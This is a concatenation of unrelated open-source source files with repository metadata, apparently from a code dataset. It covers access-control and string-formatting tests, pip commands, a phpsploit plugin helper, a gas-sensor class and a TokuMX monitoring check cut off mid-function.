default = "deny"
# other than sample3d, unittest as allowed above, a default low access level user
# should not see other projects
access = security.check_access("project", keys, "allow", default=default)
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, True)
if project.get_code() in ['sample3d','unittest']:
self.assertEqual(access, True)
else:
self.assertEqual(access, False)
else:
raise SecurityException('Please test with security version 2. Set it in your config file')
def _test_guest_allow(self):
'''test Config tag allow_guest in security tag.
Note: Since it is hard to emulate AppServer class,
this is based on logic which handles in _get_display
of BaseAppServer.
1. If allow_guest is false, then it is necessary that
Sudo is instantiated.
2. If allow_guest is true, then it is necessary that
guest login rules are added and login_as_guest is
executed.
'''
security = Security()
Environment.set_security(security)
#1. allow_guest is false
fail = False
try:
sudo = Sudo()
except Exception as e:
fail = True
self.assertEqual( False, fail )
sudo.exit()
key = [{'code': "*"}]
project_access = security.check_access("project", key, "allow")
self.assertEqual(project_access, False)
#2. allow_guest is true
Site.set_site("default")
try:
security.login_as_guest()
ticket_key = security.get_ticket_key()
access_manager = security.get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule column="login" value="{$LOGIN}" search_type="sthpw/login" access="deny" op="!=" group="search_filter"/>
<rule group="project" code="default" access="allow"/>
</rules>
''')
access_manager.add_xml_rules(xml)
finally:
Site.pop_site()
default_key = [{'code': "default"}]
project_access = security.check_access("project", default_key, "allow")
self.assertEqual(project_access, True)
unittest_key = [{'code', "sample3d"}]
project_access = security.check_access("project", unittest_key, "allow")
self.assertEqual(project_access, False)
if __name__ == "__main__":
unittest.main()
| epl-1.0 |
xbmc/atv2 | xbmc/lib/libPython/Python/Lib/test/test_format.py | 8 | 10198 | from test.test_support import verbose, have_unicode, TestFailed
import sys
# test string formatting operator (I am not sure if this is being tested
# elsewhere but, surely, some of the given cases are *not* tested because
# they crash python)
# test on unicode strings as well
overflowok = 1
def testformat(formatstr, args, output=None):
if verbose:
if output:
print "%s %% %s =? %s ..." %\
(repr(formatstr), repr(args), repr(output)),
else:
print "%s %% %s works? ..." % (repr(formatstr), repr(args)),
try:
result = formatstr % args
except OverflowError:
if not overflowok:
raise
if verbose:
print 'overflow (this is fine)'
else:
if output and result != output:
if verbose:
print 'no'
print "%s %% %s == %s != %s" %\
(repr(formatstr), repr(args), repr(result), repr(output))
else:
if verbose:
print 'yes'
def testboth(formatstr, *args):
testformat(formatstr, *args)
if have_unicode:
testformat(unicode(formatstr), *args)
testboth("%.1d", (1,), "1")
testboth("%.*d", (sys.maxint,1)) # expect overflow
testboth("%.100d", (1,), '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.117x", (1,), '0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.118x", (1,), '0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%f", (1.0,), "1.000000")
# these are trying to test the limits of the internal magic-number-length
# formatting buffer, if that number changes then these tests are less
# effective
testboth("%#.*g", (109, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+100/3.))
# test some ridiculously large precision, expect overflow
testboth('%12.*f', (123456, 1.0))
# Formatting of long integers. Overflow is not ok
overflowok = 0
testboth("%x", 10L, "a")
testboth("%x", 100000000000L, "174876e800")
testboth("%o", 10L, "12")
testboth("%o", 100000000000L, "1351035564000")
testboth("%d", 10L, "10")
testboth("%d", 100000000000L, "100000000000")
big = 123456789012345678901234567890L
testboth("%d", big, "123456789012345678901234567890")
testboth("%d", -big, "-123456789012345678901234567890")
testboth("%5d", -big, "-123456789012345678901234567890")
testboth("%31d", -big, "-123456789012345678901234567890")
testboth("%32d", -big, " -123456789012345678901234567890")
testboth("%-32d", -big, "-123456789012345678901234567890 ")
testboth("%032d", -big, "-0123456789012345678901234567890")
testboth("%-032d", -big, "-123456789012345678901234567890 ")
testboth("%034d", -big, "-000123456789012345678901234567890")
testboth("%034d", big, "0000123456789012345678901234567890")
testboth("%0+34d", big, "+000123456789012345678901234567890")
testboth("%+34d", big, " +123456789012345678901234567890")
testboth("%34d", big, " 123456789012345678901234567890")
testboth("%.2d", big, "123456789012345678901234567890")
testboth("%.30d", big, "123456789012345678901234567890")
testboth("%.31d", big, "0123456789012345678901234567890")
testboth("%32.31d", big, " 0123456789012345678901234567890")
big = 0x1234567890abcdef12345L # 21 hex digits
testboth("%x", big, "1234567890abcdef12345")
testboth("%x", -big, "-1234567890abcdef12345")
testboth("%5x", -big, "-1234567890abcdef12345")
testboth("%22x", -big, "-1234567890abcdef12345")
testboth("%23x", -big, " -1234567890abcdef12345")
testboth("%-23x", -big, "-1234567890abcdef12345 ")
testboth("%023x", -big, "-01234567890abcdef12345")
testboth("%-023x", -big, "-1234567890abcdef12345 ")
testboth("%025x", -big, "-0001234567890abcdef12345")
testboth("%025x", big, "00001234567890abcdef12345")
testboth("%0+25x", big, "+0001234567890abcdef12345")
testboth("%+25x", big, " +1234567890abcdef12345")
testboth("%25x", big, " 1234567890abcdef12345")
testboth("%.2x", big, "1234567890abcdef12345")
testboth("%.21x", big, "1234567890abcdef12345")
testboth("%.22x", big, "01234567890abcdef12345")
testboth("%23.22x", big, " 01234567890abcdef12345")
testboth("%-23.22x", big, "01234567890abcdef12345 ")
testboth("%X", big, "1234567890ABCDEF12345")
testboth("%#X", big, "0X1234567890ABCDEF12345")
testboth("%#x", big, "0x1234567890abcdef12345")
testboth("%#x", -big, "-0x1234567890abcdef12345")
testboth("%#.23x", -big, "-0x001234567890abcdef12345")
testboth("%#+.23x", big, "+0x001234567890abcdef12345")
testboth("%# .23x", big, " 0x001234567890abcdef12345")
testboth("%#+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+26.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+27.23X", big, "+0X001234567890ABCDEF12345 ")
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
# next one gets two leading zeroes from precision, and another from the
# 0 flag and the width
testboth("%#+027.23X", big, "+0X0001234567890ABCDEF12345")
# same, except no 0 flag
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
big = 012345670123456701234567012345670L # 32 octal digits
testboth("%o", big, "12345670123456701234567012345670")
testboth("%o", -big, "-12345670123456701234567012345670")
testboth("%5o", -big, "-12345670123456701234567012345670")
testboth("%33o", -big, "-12345670123456701234567012345670")
testboth("%34o", -big, " -12345670123456701234567012345670")
testboth("%-34o", -big, "-12345670123456701234567012345670 ")
testboth("%034o", -big, "-012345670123456701234567012345670")
testboth("%-034o", -big, "-12345670123456701234567012345670 ")
testboth("%036o", -big, "-00012345670123456701234567012345670")
testboth("%036o", big, "000012345670123456701234567012345670")
testboth("%0+36o", big, "+00012345670123456701234567012345670")
testboth("%+36o", big, " +12345670123456701234567012345670")
testboth("%36o", big, " 12345670123456701234567012345670")
testboth("%.2o", big, "12345670123456701234567012345670")
testboth("%.32o", big, "12345670123456701234567012345670")
testboth("%.33o", big, "012345670123456701234567012345670")
testboth("%34.33o", big, " 012345670123456701234567012345670")
testboth("%-34.33o", big, "012345670123456701234567012345670 ")
testboth("%o", big, "12345670123456701234567012345670")
testboth("%#o", big, "012345670123456701234567012345670")
testboth("%#o", -big, "-012345670123456701234567012345670")
testboth("%#.34o", -big, "-0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%# .34o", big, " 0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+37.34o", big, "+0012345670123456701234567012345670 ")
testboth("%#+37.34o", big, " +0012345670123456701234567012345670")
# next one gets one leading zero from precision
testboth("%.33o", big, "012345670123456701234567012345670")
# base marker shouldn't change that, since "0" is redundant
testboth("%#.33o", big, "012345670123456701234567012345670")
# but reduce precision, and base marker should add a zero
testboth("%#.32o", big, "012345670123456701234567012345670")
# one leading zero from precision, and another from "0" flag & width
testboth("%034.33o", big, "0012345670123456701234567012345670")
# base marker shouldn't change that
testboth("%0#34.33o", big, "0012345670123456701234567012345670")
# Some small ints, in both Python int and long flavors).
testboth("%d", 42, "42")
testboth("%d", -42, "-42")
testboth("%d", 42L, "42")
testboth("%d", -42L, "-42")
testboth("%#x", 1, "0x1")
testboth("%#x", 1L, "0x1")
testboth("%#X", 1, "0X1")
testboth("%#X", 1L, "0X1")
testboth("%#o", 1, "01")
testboth("%#o", 1L, "01")
testboth("%#o", 0, "0")
testboth("%#o", 0L, "0")
testboth("%o", 0, "0")
testboth("%o", 0L, "0")
testboth("%d", 0, "0")
testboth("%d", 0L, "0")
testboth("%#x", 0, "0x0")
testboth("%#x", 0L, "0x0")
testboth("%#X", 0, "0X0")
testboth("%#X", 0L, "0X0")
testboth("%x", 0x42, "42")
testboth("%x", -0x42, "-42")
testboth("%x", 0x42L, "42")
testboth("%x", -0x42L, "-42")
testboth("%o", 042, "42")
testboth("%o", -042, "-42")
testboth("%o", 042L, "42")
testboth("%o", -042L, "-42")
# Test exception for unknown format characters
if verbose:
print 'Testing exceptions'
def test_exc(formatstr, args, exception, excmsg):
try:
testformat(formatstr, args)
except exception, exc:
if str(exc) == excmsg:
if verbose:
print "yes"
else:
if verbose: print 'no'
print 'Unexpected ', exception, ':', repr(str(exc))
except:
if verbose: print 'no'
print 'Unexpected exception'
raise
else:
raise TestFailed, 'did not get expected exception: %s' % excmsg
test_exc('abc %a', 1, ValueError,
"unsupported format character 'a' (0x61) at index 5")
if have_unicode:
test_exc(unicode('abc %\u3000','raw-unicode-escape'), 1, ValueError,
"unsupported format character '?' (0x3000) at index 5")
test_exc('%d', '1', TypeError, "int argument required")
test_exc('%g', '1', TypeError, "float argument required")
test_exc('no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc('no format', u'1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', u'1', TypeError,
"not all arguments converted during string formatting")
class Foobar(long):
def __oct__(self):
# Returning a non-string should not blow up.
return self + 1
test_exc('%o', Foobar(), TypeError,
"expected string or Unicode object, long found")
if sys.maxint == 2**31-1:
# crashes 2.2.1 and earlier:
try:
"%*d"%(sys.maxint, -127)
except MemoryError:
pass
else:
raise TestFailed, '"%*d"%(sys.maxint, -127) should fail'
| gpl-2.0 |
BuildingLink/sentry | tests/sentry/models/test_project.py | 8 | 1099 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.models import OrganizationMember, OrganizationMemberTeam
from sentry.testutils import TestCase
class ProjectTest(TestCase):
def test_member_set_simple(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
member = OrganizationMember.objects.get(
user=user,
organization=org,
)
OrganizationMemberTeam.objects.create(
organizationmember=member,
team=team,
)
assert list(project.member_set.all()) == [member]
def test_inactive_global_member(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
OrganizationMember.objects.get(
user=user,
organization=org,
)
assert list(project.member_set.all()) == []
| bsd-3-clause |
shiney-wh/phpsploit | src/api/plugin.py | 2 | 1672 | import re
from core import plugins
class Plugin:
"""Triggering plugin attributes.
Get attributes of the currently running plugin.
This object is generally imported like this:
>>> from api import plugin
The following attributes descriptions include some
examples, based on an imaginative plugin located at
'/home/user/phpsploit/plugins/parent_dir/foobar/' path.
ATTRIBUTES:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin's docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instanciate plugin object (for use within python API)
plugin = Plugin()
| gpl-3.0 |
cynngah/uofthacksIV | generate-jobs/lib/python2.7/site-packages/pip/commands/check.py | 336 | 1382 | import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
| mit |
paran0ids0ul/infernal-twin | build/pip/build/lib.linux-i686-2.7/pip/commands/wheel.py | 239 | 7442 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import os
import warnings
from pip.basecommand import RequirementCommand
from pip.index import PackageFinder
from pip.exceptions import CommandError, PreviousBuildDirError
from pip.req import RequirementSet
from pip.utils import import_or_raise, normalize_path
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip8Warning
from pip.wheel import WheelCache, WheelBuilder
from pip import cmdoptions
DEFAULT_WHEEL_DIR = os.path.join(normalize_path(os.curdir), 'wheelhouse')
logger = logging.getLogger(__name__)
class WheelCommand(RequirementCommand):
"""
Build Wheel archives for your requirements and dependencies.
Wheel is a built-package format, and offers the advantage of not
recompiling your software during every install. For more details, see the
wheel docs: http://wheel.readthedocs.org/en/latest.
Requirements: setuptools>=0.8, and wheel.
'pip wheel' uses the bdist_wheel setuptools extension from the wheel
package to build individual wheels.
"""
name = 'wheel'
usage = """
%prog [options] <requirement specifier> ...
%prog [options] -r <requirements file> ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Build wheels from your requirements.'
def __init__(self, *args, **kw):
super(WheelCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-w', '--wheel-dir',
dest='wheel_dir',
metavar='dir',
default=DEFAULT_WHEEL_DIR,
help=("Build wheels into <dir>, where the default is "
"'<cwd>/wheelhouse'."),
)
cmd_opts.add_option(cmdoptions.use_wheel())
cmd_opts.add_option(cmdoptions.no_use_wheel())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(
'--build-option',
dest='build_options',
metavar='options',
action='append',
help="Extra arguments to be supplied to 'setup.py bdist_wheel'.")
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.download_cache())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the 'bdist_wheel' command.")
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(cmdoptions.no_clean())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def check_required_packages(self):
import_or_raise(
'wheel.bdist_wheel',
CommandError,
"'pip wheel' requires the 'wheel' package. To fix this, run: "
"pip install wheel"
)
pkg_resources = import_or_raise(
'pkg_resources',
CommandError,
"'pip wheel' requires setuptools >= 0.8 for dist-info support."
" To fix this, run: pip install --upgrade setuptools"
)
if not hasattr(pkg_resources, 'DistInfoDistribution'):
raise CommandError(
"'pip wheel' requires setuptools >= 0.8 for dist-info "
"support. To fix this, run: pip install --upgrade "
"setuptools"
)
def run(self, options, args):
self.check_required_packages()
cmdoptions.resolve_wheel_no_use_binary(options)
cmdoptions.check_install_build_global(options)
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
with self._build_session(options) as session:
finder = PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=None,
ignore_dependencies=options.ignore_dependencies,
ignore_installed=True,
isolated=options.isolated_mode,
session=session,
wheel_cache=wheel_cache,
wheel_download_dir=options.wheel_dir
)
self.populate_requirement_set(
requirement_set, args, options, finder, session, self.name,
wheel_cache
)
if not requirement_set.has_requirements:
return
try:
# build wheels
wb = WheelBuilder(
requirement_set,
finder,
build_options=options.build_options or [],
global_options=options.global_options or [],
)
if not wb.build():
raise CommandError(
"Failed to build one or more wheels"
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
if not options.no_clean:
requirement_set.cleanup_files()
| gpl-3.0 |
aldarionsevero/datalogger-ROS-rasp | sensors/mq135_sensor.py | 1 | 1548 | # Copyright (c) 2015 "aldarionsevero Lucas Severo Alves
# <[email protected]>""
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from sensor import Sensor
import botbook_mcp3002 as mcp
class Mq135Sensor(Sensor):
"""docstring for Mq135Sensor"""
def __init__(self):
Sensor.__init__(self)
self.sense_pin1 = 0 # pin 7 rasp
self.gain = float(1 / 1000)
self.gain_plus = 0
self.gaslevel = 0
def read_sensor(self):
self.gaslevel = mcp.readAnalog()
return self.gaslevel
| mit |
cberry777/dd-agent | checks.d/tokumx.py | 5 | 18952 | # (C) Datadog, Inc. 2014-2016
# (C) Leif Walsh <[email protected]> 2014
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import time
import types
# 3p
import bson
from pymongo import (
MongoClient,
ReadPreference,
uri_parser,
version as py_version,
)
# project
from checks import AgentCheck
DEFAULT_TIMEOUT = 10
class LocalRate:
"""To be used for metrics that should be sent as rates but that we want to send as histograms"""
def __init__(self, agent_check, metric_name, tags):
self.agent_check = agent_check
self.metric_name = metric_name
self.tags = tags
self.prev_val = None
self.cur_val = None
self.prev_ts = None
self.cur_ts = None
def submit_histogram(self):
value = float(self.cur_val - self.prev_val)/float(self.cur_ts - self.prev_ts)
self.agent_check.histogram(self.metric_name, value=value, tags=self.tags)
def submit(self, val):
if self.prev_val is None:
self.prev_val = val
self.prev_ts = time.time()
elif self.cur_val is None:
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
else:
self.prev_val = self.cur_val
self.prev_ts = self.cur_ts
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
class TokuMX(AgentCheck):
SERVICE_CHECK_NAME = 'tokumx.can_connect'
GAUGES = [
"indexCounters.btree.missRatio",
"globalLock.ratio",
"connections.current",
"connections.available",
"mem.resident",
"mem.virtual",
"mem.mapped",
"cursors.totalOpen",
"cursors.timedOut",
"uptime",
"stats.indexes",
"stats.indexSize",
"stats.objects",
"stats.dataSize",
"stats.storageSize",
"replSet.health",
"replSet.state",
"replSet.replicationLag",
"metrics.repl.buffer.count",
"metrics.repl.buffer.maxSizeBytes",
"metrics.repl.buffer.sizeBytes",
"ft.cachetable.size.current",
"ft.cachetable.size.writing",
"ft.cachetable.size.limit",
"ft.locktree.size.current",
"ft.locktree.size.limit",
"ft.compressionRatio.leaf",
"ft.compressionRatio.nonleaf",
"ft.compressionRatio.overall",
"ft.checkpoint.lastComplete.time",
"ft.alerts.locktreeRequestsPending",
"ft.alerts.checkpointFailures",
]
RATES = [
"indexCounters.btree.accesses",
"indexCounters.btree.hits",
"indexCounters.btree.misses",
"opcounters.insert",
"opcounters.query",
"opcounters.update",
"opcounters.delete",
"opcounters.getmore",
"opcounters.command",
"opcountersRepl.insert",
"opcountersRepl.query",
"opcountersRepl.update",
"opcountersRepl.delete",
"opcountersRepl.getmore",
"opcountersRepl.command",
"asserts.regular",
"asserts.warning",
"asserts.msg",
"asserts.user",
"asserts.rollovers",
"metrics.document.deleted",
"metrics.document.inserted",
"metrics.document.returned",
"metrics.document.updated",
"metrics.getLastError.wtime.num",
"metrics.getLastError.wtime.totalMillis",
"metrics.getLastError.wtimeouts",
"metrics.operation.fastmod",
"metrics.operation.idhack",
"metrics.operation.scanAndOrder",
"metrics.queryExecutor.scanned",
"metrics.record.moves",
"metrics.repl.apply.batches.num",
"metrics.repl.apply.batches.totalMillis",
"metrics.repl.apply.ops",
"metrics.repl.network.bytes",
"metrics.repl.network.getmores.num",
"metrics.repl.network.getmores.totalMillis",
"metrics.repl.network.ops",
"metrics.repl.network.readersCreated",
"metrics.repl.oplog.insert.num",
"metrics.repl.oplog.insert.totalMillis",
"metrics.repl.oplog.insertBytes",
"metrics.ttl.deletedDocuments",
"metrics.ttl.passes",
"ft.fsync.count",
"ft.fsync.time",
"ft.log.count",
"ft.log.time",
"ft.log.bytes",
"ft.cachetable.miss.count",
"ft.cachetable.miss.time",
"ft.cachetable.miss.full.count",
"ft.cachetable.miss.full.time",
"ft.cachetable.miss.partial.count",
"ft.cachetable.miss.partial.time",
"ft.cachetable.evictions.partial.nonleaf.clean.count",
"ft.cachetable.evictions.partial.nonleaf.clean.bytes",
"ft.cachetable.evictions.partial.leaf.clean.count",
"ft.cachetable.evictions.partial.leaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.clean.count",
"ft.cachetable.evictions.full.nonleaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.count",
"ft.cachetable.evictions.full.nonleaf.dirty.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.time",
"ft.cachetable.evictions.full.leaf.clean.count",
"ft.cachetable.evictions.full.leaf.clean.bytes",
"ft.cachetable.evictions.full.leaf.dirty.count",
"ft.cachetable.evictions.full.leaf.dirty.bytes",
"ft.cachetable.evictions.full.leaf.dirty.time",
"ft.checkpoint.count",
"ft.checkpoint.time",
"ft.checkpoint.begin.time",
"ft.checkpoint.write.nonleaf.count",
"ft.checkpoint.write.nonleaf.time",
"ft.checkpoint.write.nonleaf.bytes.uncompressed",
"ft.checkpoint.write.nonleaf.bytes.compressed",
"ft.checkpoint.write.leaf.count",
"ft.checkpoint.write.leaf.time",
"ft.checkpoint.write.leaf.bytes.uncompressed",
"ft.checkpoint.write.leaf.bytes.compressed",
"ft.serializeTime.nonleaf.serialize",
"ft.serializeTime.nonleaf.compress",
"ft.serializeTime.nonleaf.decompress",
"ft.serializeTime.nonleaf.deserialize",
"ft.serializeTime.leaf.serialize",
"ft.serializeTime.leaf.compress",
"ft.serializeTime.leaf.decompress",
"ft.serializeTime.leaf.deserialize",
"ft.alerts.longWaitEvents.logBufferWait",
"ft.alerts.longWaitEvents.fsync.count",
"ft.alerts.longWaitEvents.fsync.time",
"ft.alerts.longWaitEvents.cachePressure.count",
"ft.alerts.longWaitEvents.cachePressure.time",
"ft.alerts.longWaitEvents.checkpointBegin.count",
"ft.alerts.longWaitEvents.checkpointBegin.time",
"ft.alerts.longWaitEvents.locktreeWait.count",
"ft.alerts.longWaitEvents.locktreeWait.time",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.count",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.time",
]
METRICS = GAUGES + RATES
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_state_by_server = {}
self.idx_rates = {}
def get_library_versions(self):
return {"pymongo": py_version}
def check_last_state(self, state, server, agentConfig):
if self._last_state_by_server.get(server, -1) != state:
self._last_state_by_server[server] = state
return self.create_event(state, server, agentConfig)
def create_event(self, state, server, agentConfig):
"""Create an event with a message describing the replication
state of a mongo node"""
def get_state_description(state):
if state == 0:
return 'Starting Up'
elif state == 1:
return 'Primary'
elif state == 2:
return 'Secondary'
elif state == 3:
return 'Recovering'
elif state == 4:
return 'Fatal'
elif state == 5:
return 'Starting up (initial sync)'
elif state == 6:
return 'Unknown'
elif state == 7:
return 'Arbiter'
elif state == 8:
return 'Down'
elif state == 9:
return 'Rollback'
status = get_state_description(state)
msg_title = "%s is %s" % (server, status)
msg = "TokuMX %s just reported as %s" % (server, status)
self.event({
'timestamp': int(time.time()),
'event_type': 'tokumx',
'msg_title': msg_title,
'msg_text': msg,
'host': self.hostname
})
def _get_ssl_params(self, instance):
ssl_params = {
'ssl': instance.get('ssl', None),
'ssl_keyfile': instance.get('ssl_keyfile', None),
'ssl_certfile': instance.get('ssl_certfile', None),
'ssl_cert_reqs': instance.get('ssl_cert_reqs', None),
'ssl_ca_certs': instance.get('ssl_ca_certs', None)
}
for key, param in ssl_params.items():
if param is None:
del ssl_params[key]
return ssl_params
def _get_connection(self, instance, read_preference=None):
if 'server' not in instance:
raise Exception("Missing 'server' in tokumx config")
server = instance['server']
ssl_params = self._get_ssl_params(instance)
tags = instance.get('tags', [])
tags.append('server:%s' % server)
# de-dupe tags to avoid a memory leak
tags = list(set(tags))
# Configuration a URL, mongodb://user:pass@server/db
parsed = uri_parser.parse_uri(server)
username = parsed.get('username')
password = parsed.get('password')
db_name = parsed.get('database')
if not db_name:
self.log.info('No TokuMX database found in URI. Defaulting to admin.')
db_name = 'admin'
service_check_tags = [
"db:%s" % db_name
]
nodelist = parsed.get('nodelist')
if nodelist:
host = nodelist[0][0]
port = nodelist[0][1]
service_check_tags = service_check_tags + [
"host:%s" % host,
"port:%s" % port
]
do_auth = True
if username is None or password is None:
self.log.debug("TokuMX: cannot extract username and password from config %s" % server)
do_auth = False
try:
if read_preference:
conn = MongoClient(server,
socketTimeoutMS=DEFAULT_TIMEOUT*1000,
read_preference=ReadPreference.SECONDARY,
**ssl_params)
else:
conn = MongoClient(server, socketTimeoutMS=DEFAULT_TIMEOUT*1000, **ssl_params)
db = conn[db_name]
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags)
raise
if do_auth:
if not db.authenticate(username, password):
message = "TokuMX: cannot connect with config %s" % server
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise Exception(message)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
return server, conn, db, tags
def _get_replica_metrics(self, instance, conn, db, tags, server, status):
try:
data = {}
replSet = conn['admin'].command('replSetGetStatus')
if replSet:
primary = None
current = None
# find nodes: master and current node (ourself)
for member in replSet.get('members'):
if member.get('self'):
current = member
if int(member.get('state')) == 1:
primary = member
# If we have both we can compute a lag time
if current is not None and primary is not None:
lag = primary['optimeDate'] - current['optimeDate']
# Python 2.7 has this built in, python < 2.7 don't...
if hasattr(lag,'total_seconds'):
data['replicationLag'] = lag.total_seconds()
else:
data['replicationLag'] = (
lag.microseconds +
(lag.seconds + lag.days * 24 * 3600) * 10**6
) / 10.0**6
if current is not None:
data['health'] = current['health']
tags.append('replset:%s' % replSet['set'])
tags.append('replstate:%s' % current['stateStr'])
if current['stateStr'] == 'PRIMARY':
tags.append('role:primary')
else:
tags.append('role:secondary')
self.log.debug("Current replSet member is secondary. "
"Creating new connection to set read_preference to secondary.")
# need a new connection to deal with replica sets
server, conn, db, _ = self._get_connection(instance, read_preference=ReadPreference.SECONDARY)
data['state'] = replSet['myState']
self.check_last_state(data['state'], server, self.agentConfig)
status['replSet'] = data
except Exception as e:
if "OperationFailure" in repr(e) and "replSetGetStatus" in str(e):
pass
else:
raise e
return conn, db
def submit_idx_rate(self, metric_name, value, tags, key):
if key not in self.idx_rates:
